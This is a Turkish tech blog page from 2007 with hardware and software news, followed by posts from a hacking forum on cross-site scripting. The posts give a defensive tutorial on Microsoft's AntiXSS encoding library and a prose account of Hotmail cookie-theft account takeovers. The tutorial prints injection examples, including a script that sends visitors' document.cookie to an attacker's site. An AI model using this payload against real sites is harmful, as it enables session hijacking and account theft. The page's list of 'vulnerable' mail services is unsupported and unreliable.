Yazar: | Kategori: Haberler
Yorum: 0
Microsoft yeni işletim sistemi Windows 7′yi 2010 yılında piyasaya sunacağını açıkladı.
 
 Windows 7 2010da Piyasada

Bugüne kadar piyasada Micosoft Windows 7′nin 2010 ile 2012 arasında bir tarihte satışa sunulması beklendiğne dair söylentiler dönüyordu. Bu hafta içi Orlando’da yapılan Microsoft’s Global Exchange (MGX) kongresinde, Microsoft Windows 7′nin 2009 yılı sonu ve 2010 yılının ilk günleri arasında bir tarihte piyasaya çıkacağı tüm dünyaya duyuruldu.

 

Kaynak:  www.chip.com

27 Temmuz 2007
Yazar: | Kategori: Haberler
Yorum: 0
Gigabyte’ın yeni ekran kartı Shader Model 4.0 ve Microsoft DirectX® 10 gibi standartları kullanıyor.
 
20070723111723 GIGABYTE GV RX26T256H

Dünyanın önde gelen anakart ve ekran kartı üreticilerinden GIGABYTE UNITED INC., ATI’nin yeni Radeon® HD 2000 Serisi mimarisiyle birleştirilen en son 65 nanometre grafik işleme teknolojisini kullanarak grafik performansında yeni bir standart yaratan GV-RX26T256H’yi duyurdu. Yeni 65nm teknolojisi ile, GIGABYTE GV-RX26T256H önceki nesillere oranla daha az ısı üretirken, bugünün zorlu uygulamalarının üstesinden gelmek için çarpıcı şekilde daha hızlı saat ve bellek hızı rekorları sağlıyor. Ayrıca, GIGABYTE GV-RX26T256H entegre grafik çözümleri, tamamen gerçekçi, yüksek tanımlı oyun ve yüksek kalitede HD görüntü deneyimi sağlaması dahil, özellik açısından eşsiz zenginliklere sahip.

Grafik görüntü performansını en üst seviyeye çıkartmak için, GIGABYTE GV-RX26 serisi ürünler; oyunun gerçeklik seviyesini geliştirmek üzere dinamik aydınlatma ve hava gibi inanılmaz derecede ayrıntılı görsel efektler sağlamak için Shader Model 4.0 ve Microsoft DirectX® 10 başta olmak üzere, gelişmiş görsel teknoloji standartları kullanıyor. ATI’nin Avivo™ HD teknolojisini sunan GIGABYTE GV-RX26 serisi; sessiz ve soğuk işlevselliliği ile yüksek kalitede HD görüntü işleme ve ayrıca ev sineması tutkunlarını sevindirecek olan; aslına uygun, kusursuz derecede düzgün ve yeni nesil görüntüleri kayıttan oynatma için yerleşik 5.1 surround ses özelliği taşıyor.

Ayrıca; GV-RX26T256H, istenmeyen ses ve gürültüye neden olmadan, grafik işlemcisini (GPU) fansız olarak soğutmak için, doğal bir ısı yayımı sistemi oluşturmak üzere kasanın içi ve dışı arasındaki termal farktan yararlanan GIGABYTE’ın benzersiz Silent-Pipe II™ termal tasarımına sahip. GIGABYTE GV-RX26T256H, yüksek performanslı bir iç sıcaklık borusu ve sistem performansından ödün vermeden dengeli soğumayı sağlayan gelişmiş Screen-CoolingTM teknolojisi ile donatılmış durumda.

Kaynak: www.chip.com

Yazar: | Kategori: Haberler
Yorum: 0
Optik geniş bant Internet erişimiyle bir DVD filmi bilgisayarımıza 6 dakikada indirmek mümkün olacak
 
20070725230230 Optik Geniş Bant Internet Erişimi

Newsweek dergisinin haberine göre, Güney Kore ve Japonya’da geliştirilen “optik geniş bant” internet erişimiyle 4.7 gigabyte büyüklüğünde bir filmi 6 dakikada indirmek mümkün olacak.

İnternetteki veri çokluğuna karşın bağlantı hızların düşüklüğü, özellikle Türkiye gibi internet erişiminin alınan hizmete oranla çok yüksek olduğu ülkelerde büyük bir sorun iken Japonya ve Güney Kore bağlantı hızı konusunda devrim yapmaya hazırlanıyor.

Mevcut klasik geniş bant internet bağlantılarında büyük fotoğraf, müzik ya da film indirmek oldukça uzun zaman alırken, yeni geliştirilen “optik geniş bant” internet dünyasında yeni bir çığır açacak.

Süper Hızlı İnternet
Newsweek dergisinin “Süper hızlı internet” olarak nitelendirdiği bu yöntemin fiber kablolarla evlere internet hizmeti olduğu kaydediliyor. Söz konusu iki ülkede çok sayıda insan tarafından kullanılmaya başlanan bu bağlantının saniyede 100 megabitlik bir hız sunduğu kaydediliyor. Bu bağlantı, varolan erişim hızının 20 katından daha yüksek bir erişim hızı vaat ediyor.

Optik geniş bant sistemi ile normalde yaklaşık 2 saat süren 4.7 GB boyutundaki bir filmin bilgisayara indirilmesi sadece 6 dakika sürüyor.

Hollywood Kaygılı
Ancak pek çok internet kullanıcısı için rüya gibi gelen bu bağlantı hızından rahatsızlık duyan kesimler de bulunuyor. Asya’da bulunan DVD oynatıcı üreticileri, bir filmi 6 dakikada indirebilen hiç kimsenin bir DVD oynatıcıya ihtiyacı olmayacağına inanıyor.

Bu bağlantıya sahip kişilerin yasadışı yollardan film indirebileceği inancı, Hollywood tarafında ise fikri haklar açısından kaygı yaratıyor.
Kaynak:  www.chip.com

27 Temmuz 2007
Yazar: | Kategori: Haberler
Yorum: 1

İnternet hız rekoru İsveç’te yaşayan 75 yaşındaki bayan Sigbritt Lothberg’in evinde kırıldı.

İnternet hız rekoru İsveç’te yaşayan 75 yaşındaki Bayan Sigbritt Lothberg’in evinde kırıldı. İsveç’in Karlstad şehrinde yaşayan Lothberg’in evinden internete saniyede 40Gbit hızla bağlanıldı.

Sadece 2 saniyeden daha az bir zamanda, bir DVD filmin tamamını ev bilgisayarına indirmeye olanak tanıyan rekor bağlantı hızına bağlantıda yeni bir modülasyon tekniği kullanılması ile ulaşıldı.

Bölgenin internet sağlayıcısının teknik birimi ve Lothberg’in donanım uzmanı oğlu (hayırlı evlat) tarafından gerçekleştirilen bağlantı şu ana kadar dünyada yakalanan en yüksek internet bağlantı hızı olarak tarihe geçti.

Yazar: | Kategori: Haberler
Yorum: 0

telekom 80 internet Duasına Çıkıyoruz!Geceden bu yana yurtdışındaki internet sitelerine erişimde hissedilir bir yavaşlama var. Türk Telekom, bu konuda bir açıklama yapmadı.  Konu hakkında bilgi almak için Türk Telekom‘un Genel Merkezi ve Teknik Destek Hattı‘nı da aradığınızda “Ekranımızda böyle bir mesaj yok. Sorun da yok” cevabını alıyorsunuz. Oysa şu saatlerde ne YouTube‘a ne de diğer popüler yabancı sitelere (özellikle de Amerika’dan yayın yapan) erişmek istediğinizde tosbağa hızında bağlanabiliyorsunuz. Maalesef ki bu siteler arasında 100 Megabit çıkışa sahip olan SDN sunucuları da nasibini alıyor. Konuyla ilgili Türk Telekom‘dan bir açıklama bekliyoruz.

Yine mi Balina?

Her şey olabilir; balina kabloyu ısırabilir, transatlantik kabloya çarpmış olabilir, tören sırasında kurdela yerine fiberoptik kabloları kesmiş olabilirler, ya da yurtdışı çıkışı meme yapmış da olabilir… Ne olursa olsun, her şeye hazırlıklı bir şekilde açıklama bekliyoruz.

Yurtdışı internet çıkışını gösteren grafikleri sitesinden kaldıran Türk Telekom, bu arıza duyurularını yayınlamamakla ve kamuoyunu bilgilendirmemekle çok eleştiri alıyor.

Yoksa bu sıkıntılar yüzünden, yumurtaya can veren Rabbimizden, gürül gürül dataların aktığı fiberoptik kabloların biz aciz internet kullanıcılarını da nasiplendirmesi için toplu duaya çıkacağımız günler mi yakınlaşıyor.

Yazar: | Kategori: Genel, Haberler, Yazilim
Yorum: 177

Office Enterprise 2007, konum veya ağ durumuna bakılmaksızın, başkalarıyla işbirliği yapması ve bilgilerle verimli bir biçimde çalışması gereken kişiler için sağlanmış en eksiksiz Microsoft araç kümesidir. Office Enterprise 2007 Microsoft Office Professional Plus 2007′nin kuvvetli yönlerini temel alır ve kişilerin işbirliği içinde çalışarak her türlü bilgiyi verimlilikle toplamalarına, depolamalarına, düzenlemelerine, bulmalarına ve kolayca paylaşmalarına olanak tanıyan iki ek araç sağlar: Microsoft Office Groove 2007 ve Microsoft Office OneNote 2007. Office Groove 2007, ekiplerin, en az BT desteğiyle, konumdan bağımsız olarak birlikte çalışabilmeleri için zengin ve daha güvenli bir işbirliği ortamı sağlar. Office OneNote 2007 ise, ekiplerin daha kısa sürede daha iyi sonuçlar üretebilmeleri için, neredeyse her tür içeriğe yönelik eksiksiz bilgi yönetimi özellikleri sunar.Microsoft Office 2007 Enterprise’da mevcut olan programlar:

Microsoft Office Access 2007′deki yenilikler

Microsoft Office Access 2007 izlemeye hızlı bir şekilde başlamanız, raporlamanız ve yönetilebilir bir ortamda bilgileri paylaşmanız için etkili bir araç takımı sağlıyor. Yeni, etkileşimli tasarım yetenekleri, izleme uygulaması şablonlarının önceden oluşturulmuş kitaplığı ve Microsoft SQL Server dahil birçok kaynaktan gelen verilerle çalışabilme kabiliyetiyle, Office Access 2007, derin bir veritabanı bilgisine gerek kalmadan, çekici ve işlevsel izleme uygulamaları oluşturmanıza izin verir. Değişen iş ihtiyaçlarına göre hızla uygulama ve rapor oluşturabilir, bunları yeni ihtiyaçlara uyarlayabilirsiniz; Microsoft Windows SharePoint Services 3.0 ile yeni, iyileştirilmiş, yüzeysel olmayan tümleşmesiyle Office Access 2007 bilgileri paylaşmanıza, yönetmenize, denetlemenize ve bilgilerin yedeğini almanıza yardımcı olur.

Microsoft Office Excel 2007′deki yenilikler

Office Excel 2007, daha bilinçli kararlar almanıza yardımcı olmak için bilgileri çözümlemeye, paylaşmaya ve yönetmeye yönelik güçlü bir araçtır. Office Excel 2007 yeni, sonuca yönelik bir arabirim, oluşturulması ve kullanımı kolay Özet Tablo görünümleri, gelişmiş formül yazma ve zengin veri görüntüleme olanaklarının yanı sıra profesyonel görünümlü grafik ve tablolar oluşturmak için çok daha hızlı bir çözüm sunar. Excel Services ve Microsoft Office SharePoint Server 2007′yi kullanarak, işle ilgili önemli bilgiler içeren elektronik tabloları paylaşabilir ve yönetebilirsiniz.

Microsoft Office InfoPath 2007′deki yenilikler

Microsoft Office InfoPath 2007 programını, elektronik iş formlarını tasarlamak ve doldurmak için kullanabilirsiniz. Office InfoPath 2007 diğer 2007 Microsoft Office sistemi programları ve sunucularıyla daha iyi bütünleşme sağlar, bu da veri toplama, düzenleme ve yönetmenizi geliştirir.

Microsoft Office OneNote 2007′deki yenilikler

Microsoft Office Sistemi’nin kullanımı kolay not alma ve bilgi yönetimi programı Microsoft Office OneNote 2007′ye hoş geldiniz. Düşünce ve fikirlerinizi, daha sonra kolayca düzenleyebileceğiniz, arama yapabileceğiniz ve paylaşabileceğiniz elektronik not defterlerine kaydetmek için OneNote’u kullanın.

Microsoft Office Outlook 2007′ye Genel Bakış

Office Outlook 2007, zamanınızı ve bilgilerinizi yönetmek, sınırların ötesinde bağlantı kurmak ve size ulaşan bilgilerin denetimini elinizde tutmak için tümleşik bir çözüm sağlar. Office Outlook 2007, tek bir konumdan iletişim malzemeleriniz arasında hızla arama yapmak, çalışmanızı düzenlemek ve bilgileri başkalarıyla daha rahat paylaşmak için kullanabileceğiniz yenilikler sunar.

Microsoft Office Powerpoint 2007′deki yenilikler

Office PowerPoint 2007, çok etkili, dinamik sunuları hızla oluşturabilmenizi sağlarken, iş akışını ve bu bilgileri paylaşma yollarını da bütünleştirir. Office PowerPoint 2007, müthiş görünümlü sunular oluşturabilmeniz için yeniden tasarlanan kullanıcı arabiriminden yeni SmartArt Grafikleri ve biçimlendirme yeteneklerine kadar her şeyi sizin denetiminize sunar.

Microsoft Office Publisher 2007′deki Yenilikler

Microsoft Office Publisher 2007 uygulaması profesyonel görünümlü pazarlama ve iletişim malzemeleri oluşturmanıza, tasarlamanıza ve yayımlamanıza yardımcı olan bir işletme yayımcılığı programıdır. Profesyonel tasarım ve üretim uzmanlığı olmadan şirket içinde size ilk kavramdan son teslimata kadar kılavuzluk edecek sezgisel ve görev tabanlı bir ortamda baskı, e-posta ve Web için malzeme oluşturabilirsiniz.

Microsoft Office Word 2007′deki yenilikler

Office Word 2007, yeni bir kullanıcı arabiriminde kapsamlı bir yazı araçları kümesi sağlayarak kullanıcıların profesyonel görünümlü belgeler oluşturmasına yardımcı olur. Zengin gözden geçirme, açıklama ekleme ve karşılaştırma yetenekleri, iş arkadaşlarınızın görüşlerini kısa süre içinde toplamanıza ve bunları yönetmenize katkıda bulunur. İleri düzey veri tümleştirmesinin yardımıyla, belgelerin önemli iş bilgilerini içeren kaynaklarla bağlantılı kalmasını güvence altına alırsınız

Yazar: | Kategori: Haberler
Yorum: 1

xss [Xss] Anti   Cross Site Scripting   *Korunma Yöntemi!

Merhabalar..

HacKHeLL.Com Olarak daha önce forumumuzda xss yi program haline getirerek şu anda üyelerin göremediği yer ‘de arşive kaldırmış bulunuyoruz.

Makaleyi okumadan Buraya Tıklatarak Ulaşacağınız Bölümden Xss’nin Ne olduğuna dair bilgiler alabilirsiniz..

Uzun zaman geçti Xss neden hala anlatılmıyor ya/da çalışmıyormu? Gibi sorunlarınıza cavap niteliyi taşıyan sayfaya Buraya Tıklatarak ulaşabilirsiniz..

Bu kadar bilgiden sonra Xss nin hala var olduğunu düşünerek korunma yollarımıza göz atalım.

Cross Site Scripting bilindiği gibi saadece maillerde değil web sitelerini hackleme yöntemleri arasında ‘da bulunmakta.. Ayrıntılı bilgi için Buraya Bakabilirsiniz..

Makalemizde Cross Site Scripting açığından korunmak için gerekli yolları Microsoft tarafından piyasaya sürülen program ile anlatacağım..

Öncelikle Microsoft ‘un resmi sitesindeki Microsoft.Application.Security.AntiXSS‘yazılımı bilgisayarımıza inndiriyoruz..

Kurulum evreleri Gif örneyi :
caps [Xss] Anti   Cross Site Scripting   *Korunma Yöntemi!

Programı install ettikten sonra artık neye yaradığından bahsedelim =)

Microsoft.Application.Security.AntiXSS namespace’inden ulaşabileceğimiz 7 vazgeçilmez metot ile hedeften sitemizi kaçırıcaz bu metotlar ;

• HtmlEncode
• HtmlAttributeEncode
• JavaScriptEncode
• UrlEncode
• VisualBasicScriptEncode
• XmlEncode
• XmlAttributeEncode


Örnek :
l

HTML Code:

tAd.Text = “‘); location.href=’[url]http://www.hackhell.com’;[/url] alert(’a”);

— Bunun yerine ;

Olması Gereken : l

Code:

tAd.Text = JavaScriptEncode(”‘); location.href=’http://hackhell.com’; alert(’a”);

Neden böyle olması gerekiyor diye kendi kendinize sorabilirsiniz ANTİXSS kütüphanesi belli başlı karakterleri ” Encode ” eder bunlar ascii değeri 160-255 olan karakterlerdir.

_______________
ProfessionaL’lar için
Biraz daha ayrıntıya inerisek;

Kullanıcıdan alınan bilgi olduğu gibi veritabanına kaydediliyorsa ve aynı şekilde veritabanındanda istemciye gönderiliyorsa kötü niyetli kodların istemci tarafından çalıştırılması muhtemeldir.

Örneğin bir ziyaretçi defteri doldururken mesaj kısmına

Code:

<script> location.href= ‘http://www.google.com’;</script>

Gibi bir bilgi girilirse ve herhangi bir kontrol olmadan bu siteyi ziyaret eden kullanıcılara bu bilgi gönderilirse, ziyaretçiler karşılarında sizin sitenizi değil, Google’ı göreceklerdir.

Ziyaretçilerin tarayıcılarında çalıştırılan bir javascript kodu ziyaretçiniz hakkındaki Session bilgilerinin de çalınmasına sebep olabilir.

Code:

<script> document.location='http://www.kotuniyetlisite.com/yaz.aspx?a='+document.cookie </script>

Şeklinde girilen bir script sitenizi ziyaret eden her kullanıcının Session bilgilerini saldırganın sitesine gönderir. Bundan sonrası saldırganın tercihne kalmış. Session bilgilerini kendine mail atabilir yada kendi veritabanına kaydebilir.

Asp.NET programcıları bu konuda diğer web geliştiricilerinden biraz daha şanslı. Çünkü, “<” ve “>” karakterleri içinde gelen bilgi “Potansiyel Tehlikeli Bilgi” olarak algılanır ve sistem hata verir.

Ancak günümüz de sık geliştirilen “İçerik Yönetim Sistem” leri “FCK Editor” gibi html kodu üreten WYSWYG* editörleri kullanmakta.

Bu da Asp.NET programcısının “Fck Editor” kullandığı sayfasının başına ValidateRequest=”false” gibi bir kodu eklemesine sebep veriyor. Bu da XSS saldırıları için bir davet anlamına gelir.

Buraya kadar verdiğimiz örnekler HTML kodları arasına sızan tekniklerdi.

Kullanıcıdan alınan bilgi ile oluşturulabilecek JavaScript, VBScript, XML de bu tehlikelere maruz kalabilir.

Javascript için basit bir örnek verelim.
Default.aspx dosyamızda bulunan Javascript :

Code:

<script type="text/javascript" > alert('Merhaba’ + ‘<asp:Literal runat="server" id="ltAd" />'); </script>

Default.aspx.cs dosyasından gönderilen bilgi :

Code:

ltAd.Text = "heLL";

Sayfa çalıştırıldığında “Merhaba heLL” şeklinde bir MessageBox çıkıyor.

“heLL” değerinin veritabanından geldiğini farzedelim. Eğer veritabanından gelen şöyle bir şey olursa :

Code:

ltAd.Text = " ' location.href='http://www.google.com'; alert('a";

Sayfamız derlendiğinde ortaya çıkan Javascript kodunu inceleyelim :

Code:

<script type="text/javascript" > alert('Merhaba '); location.href='http://www.google.com'; alert('a'); </script>

Ziyaretçi “Merhaba” şeklinde bir MessageBox görür ve kendini yine Google da bulur.

Bu konuda örnekler çoğaltılabilir.

Yukarıda verdiğim örnek ile ;

Code:

ltAd.Text = "'); location.href='http://www.google.com'; alert('a");

yerine;

Code:

using Microsoft.Security.Application.AntiXss; ... ltAd.Text = JavaScriptEncode("'); location.href='http://www.google.com'; alert('a");

Şeklinde kullandığımızda bir ziyaretçilerimiz bir zarar görmeyecektir.

Sayfamızı derledikten sonra oluşan Javascript kodumuzu inceleyelim :

Code:

<script type="text/javascript" > alert('Merhaba '\x27\x29\x3b location.href\x3d\x27http\x3a\x2f\x2fwww.google.com\x27\x3b alert\x28\x27a'); </script>

Görüldüğü gibi “)“ işareti \x27 ye , “;” işareti \x29 a ve diğer zararlı karakterlerde Javascript’in karşılıklarına çevrilmiş. Bu kodlar çalıştırılamaz ama aynı karaktersel değerleini korurlar.

Örneğin

Code:

ltAd.Text = Microsoft.Security.Application.AntiXss.JavaScriptEncode("heLL");


Şeklinde bir kullanımda ekranda “heLL” yazar ancak kaynak kodunda “ç” karakteri \u00e7 olarak kodlanmıştır.

“ç” harfi ascii tablosunda bulunmuyor ancak unicode değer olan 351’in Hexadecimal eşiti 00e7 dir. Dolayısıyla Javascript’tin ç harfini \u00e7 olarak tanır. .

Saygılar…

Not: Konunun Bir Kopyası Security Bölümün’de Diğeri ise mail hacking seucirty bölümünde sabitte-kilitli olarak bulunmaktadır.

Yazar: | Kategori: Haberler
Yorum: 7

XSS Nedir?

XSS (Cross Site Scripting – Çapraz Kod Çalıştırma) kısaca, HTML ve JavaScript yardımıyla bir sitede, siteye giren kullanıcıya tehlike arz edecek şekilde kod çalıştırmaya denir. Ziyaretçilerinizden bilgi almak amaçlı ya da onlara ait hesapları tekrar tekrar şifre girmeden kullanmaları için yollamış olduğunuz çerezleri -cookies- XSS yardımıyla çalabilirler ve kendilerini, sisteme o ziyaretçiymiş gibi gösterebilirler.

Çerezler Nasıl Çalışır?
Bir çerez, istemci -yani siz- tarafında herhangi bir bilgiyi, oturum numarasını vs. saklamaya yarayan ve sadece kendisinin yollandığı alan adı (domain) için bilgilerini veren bir araçtır denilebilir. Yani herhangi bir siteye girdiğinizde, karşı taraftan size bilgilerinizi tutmak için bir çerez yollanabilir. (Eğer tarayıcınızın güvenlik ayarları çok sıkı değilse, otomatik olarak kabul ediecektir bu çerezler )
Kullanım alanları, genel olarak kullanıcı bilgileri ya da sizin karşı taraftaki oturum numaranızı karşılaştırmak içindir. Bu noktada, karşı tarafın, sizin diğer çerezlerinizin içindeki bilgileri ele geçirmenizden şüphe edebilirsiniz belki; ancak başta da bahsettiğimiz gibi, tarayıcılar sadece çerezi isteyen yerin alan adı ve dosya yolu (örn. www.hackhell.com/foo adresine ayarlı bir çerez, asla www.hackhell.com/hodo adresine yollanmaz) uyuşuyorsa bu bilgileri yollarlar, olağanüstü bir durum dışında bu bir güvenlik sorununa yol açmaz

XSS Nasıl Çalışır?
Bu yazının tehlikeli işler yapmaya meyilli olan kişiler tarafından da okunma ihitmali olduğu için açık açık anlatım yoluna gitmeyi düşünmüyorum Şöyle bir gözden geçirecek olursak;
JavaScript dilinde çerezleri yönetmeyi sağlayan bir Cookie yöntemi bulunmaktadır. (yani; document.cookie) Bu yöntem yardımıyla sayfaya ait olan çerezler alınıp, okunabilir ve değiştirilebilir. [1] XSS açıklarından yararlanan kötü niyetli kişiler de, JavaScript’in bu özelliğinden yararlanarak sayfayı gezen kullanıcının çerez bilgilerini alıp, kendilerininkiyle değiştirmeye çalışırlar.

___________

Internet Dünya’sının en çok kullanılan E-Posta Servisi Hotmail’de meydana gelen ciddi bir güvenlik açığı Hacker ( Bilgisayar Korsanları)‘nın eline düştü. Hacker’lar her geçen gün kurbanlarını ele geçirmek için yeni yöntemler keşfediyorlar. İşte bunlardan bir tanesi Dünya üzerinde her ülkeden her insanın kullandığı Hotmail ‘deki XSS Güvenlik Açığı.


Bu Güvenlik açığı nasıl çalışıyor; hakkında biraz bilgi vereyim ;

Öncelikle Hacker’lar Hotmail’in XSS Kodunu Bedava (Free) bir Hosting’e yerleştiyorlar burada sizin ilginizi çekecek bir site kuruyorlar. Örneğin Öğretmensiniz ve Milli Eğitim Bakanlığının Yeni Öğretmen Atamaları Hakkındaki Genelgesi Hakkında bir bilginiz. Hacker bunu biliyor ve sizin ilginizi çekecek olan bu siteyi kuruyor. Siteyi kurarken için Hotmail’in XSS Güvenlik Açığına neden olan Kod’u yerleştiriyor ve sitenin ismini size E-mail olarak yolluyor.E-mail kutunuza gelen site link’ine tıklarsanız, Bilgisayarınızdaki Cookie(Çerez)’ler hacker’ın sitenin içine yerleştirmiş olduğu Kod sayesinde hacker’a gidiyor. Hacker daha sonra bu Cookie’lerin içinden sizin Hotmail Hesabınıza ait olan Cookileri bulup birkaç kod ekleme işlemi ile değiştirip kaydediyor. Daha sonra kendi bilgisayarından şifresiz olarak sizin E-mail’lerinizi okuyabiliyor.
Peki sadece okumakla yetiniyor mu hacker’lar ?

Tabii ki hayır! İşte sadece bir hacker’ın düşünebileceği bir kurnazlık daha gösteriyorlar burada. Hotmail Giriş bölümüne geri geliyorlar ve “ Parolamı Unuttum “ seçeneğine tıklayarak sizin E-mail adresinizi giriyorlar, Şifrenizin E-Posta olarak sizin E-mail hesabına gelmesine neden oluyorlar. Daha sonra şifresiz olarak giriş yapabildikleri için giriyor ve hotmail’in göndermiş olduğu “Kayıp Parola“ İsteği mail’inin içindeki şifrenizi alıyorlar. Ve şifreyi, Gizli Sorunuzu ve ya diğer tüm bilgilerinizi tamamen ele geçirmiş oluyorlar.

Bu Güvenlik Açığından Hotmail’in Haberi Yok mu ?

Var ancak şu an için bir çözüm ya-da yama yayınlanmadı. Ülkemizde özellikle son 1 haftada bir çok kişinin E-Posta hesabı bu yöntem ile hack edildi.

Hesabınızla Neler Yapılabilir?
Ömcelikle size gelen mailler okunabilir. Tabi çoğu kişi gibi, hotmail türü emailleri sadece üye olduğunuz mail listelerinden gelen mailler için kullanıyor. Siz bu tür bir kullanım yapıyor ve bu nedenle de “önemli değil” diye düşünüyorsanız, yanılıyorsunuz. Çünkü Bilişim Polisinin ülkemizde çok yapıldığını bildirdiği ve uyardığı sibersuçlardan birisi “cep telefonu kontür” hırsızlığı.
Kontür hırsızlığı özellikle internet cafeleri kullanan askerlerin başına geliyordu ama bugünlerde bu açık nedeniyle herkesin başına gelebilir oldu. Hotmailinizi ele geçiren kiş, eğer bir adres defteriniz varsa, o defterdeki kişilere mail atarak, “kontür” ihtiyacınız olduğunu ve göndermesini rica ettiğinizi bildiriyor. Bu yollanan kontürleri de sonra satıyor. Bu yolla epeyce yolunu bulanlar olduğu yine Bilişim Polisi tarafından iletilen bir husus.

Hotmail XSS Güvenlik Açığından Korunmak İçin Neler Yapmalıyız ?

Öncelikle her güvenlik açığı potansiyel bir saldırı nedenidir. Hacker’lar her zaman hedef ve kurban bulurlar. Beni neden hedef alsınlar dediğiniz zaman bilin ki hedefin ta kendisi oldunuz. Bilgi güvenliği, Özel Hayat Güvenliği, Günümüzde oldukça önemli.
1. Tanımadığınız ya – da tanıdığınız kişilerden sizlere gelen ve içinde sadece site ismi (url) bulunuyorsa o adrese asla tıklamayınız. Tanıdığınız kişilerden de dedim çünkü hacker’lar piyasada dolaşan bir mail hacking programı sayesinde istediği E-Posta hesabindan, İstedikleri E-Posta hesabınıza E-mail gönderebiliyorlar.
2. Size gelen ve içinde site ismi (URL) bulunan E-mail’leri gönderen kişiyi teyit ettikten sonra açınız.
3. Internet üzerinde güvenliğiniz için mutlaka ama mutlakan Anti-virüs ve Güvenlik Duvar (Firewall) yazılımlarının İKİSİNİ BİRDEN kullanınınız.
4. Yeniliklerden haberdar olmak ve güvenliğiniz için, Bizi Takip ediniz!

Hotmail XSS Herkes Biliyor , Mynettte Herkes Biliyordur
Ama Cookie Çalıp Mail Giremezler.
XSS Açığı olan Mail Sitelerini Yazayım Bilginiz olsun.

Hotmail – Mynet – Linuxmail – SkyMail – HackerMail -Mail.Ru – Yahoo – AİM – Mail.com ..vs Aklıma Gelenler Bunlar..

Yukarı
Sayfa 5 ile 6123456
Yazilar iin RSS aboneligi